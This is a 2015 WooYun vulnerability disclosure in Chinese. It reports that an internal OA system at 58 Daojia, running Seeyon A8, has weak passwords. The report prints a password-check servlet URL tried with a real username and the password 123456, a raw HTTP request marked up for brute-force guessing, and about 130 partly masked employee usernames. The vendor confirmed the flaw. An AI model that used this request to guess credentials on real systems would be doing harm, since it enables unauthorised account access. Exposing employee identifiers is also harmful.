当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151472

漏洞标题:58到家某内部系统存在大量弱口令

相关厂商:58同城

漏洞作者: 路人甲

提交时间:2015-11-03 11:58

修复时间:2015-12-18 14:00

公开时间:2015-12-18 14:00

漏洞类型:后台弱口令

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-03: 厂商已经确认,细节仅向厂商公开
2015-11-13: 细节向核心白帽子及相关领域专家公开
2015-11-23: 细节向普通白帽子公开
2015-12-03: 细节向实习白帽子公开
2015-12-18: 细节向公众公开

简要描述:

详细说明:

参考 WooYun: 致远A8-V5存在任意用户密码修改漏洞
http://oa.daojia.58.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=xxxuser&P_2_String=xxxpwd
当用户名密码正确时返回true
否则返回false
例如

http://oa.daojia.58.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=guoyi&P_2_String=123456


Snap252.jpg


Snap253.jpg


登录成功
抓包

GET //seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=§xxxuser§&P_2_String=§xxxpwd§ HTTP/1.1
Host: oa.daojia.58.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:
Connection: keep-alive


使用通讯录作为用户名 123456作为密码

Snap254.jpg


一共一百三十多个
手工mask一下

wa***en
zh***ng
wa***ui
zo***ng
zh***ng
ta***yi
wa***an
zh***ng
du***ei
ca***bo
gu***yi
di***an
ch***ng
da***li
du***ao
du***ng
fa***ui
ha***ao
hu***an
hu***di
li***ei
li***ng
li***ng
li***he
li***in
lu***ng
pe***xu
ta***ng
wa***ng
we***ng
wu***ng
xu***ia
ya***ao
ya***en
ya***ng
yi***ng
zh***un
zh***zi
zh***ng
zh***ng
zh***an
ch***ei
zh***ia
se***n2
zh***an
zh***ng
li***ao
ge***yu
du***en
zh***an
ca***an
ni***in
fa***uo
ga***ao
ya***di
wu***xu
qu***ui
ye***ng
ma***ng
su***ng
li***un
lv***ng
wa***ei
zh***hu
zh***yu
ge***yu
yi***ng
ma***li
li***an
zh***an
gu***en
bu***ue
zh***yi
xi***un
ou***li
du***in
lu***ng
di***li
ya***li
so***ng
zh***an
so***an
ji***ng
wa***an
so***ia
ba***na
ho***ei
cu***ng
ca***ua
wa***un
wa***yu
pa***an
hu***yu
hu***ya
we***yu
yu***an
ma***ao
ca***ue
me***en
zh***ng
li***ei
li***qi
hu***en
ji***an
lu***ng
gu***ei
de***yu
re***an
re***ng
we***ng
xi***ng
yu***ui
su***un
ya***na
zh***ng
ti***ge
hu***qi
zh***ng
du***an
xu***ui
ya***ei
ni***ao
hu***ng
lu***ui
ta***yu
ji***ng
li***hu
mi***su
li***ia
fe***in
wu***un
ca***ng
so***an
fa***ao
zh***ng
lu***ao
yu***bo
he***le
wa***in

漏洞证明:

http://oa.daojia.58.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=guoyi&P_2_String=123456


Snap252.jpg


Snap253.jpg


Snap254.jpg


mask标签怎么用

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-11-03 13:59

厂商回复:

确认漏洞存在,邮件反馈给到家的小伙伴进行处理了。

最新状态:

暂无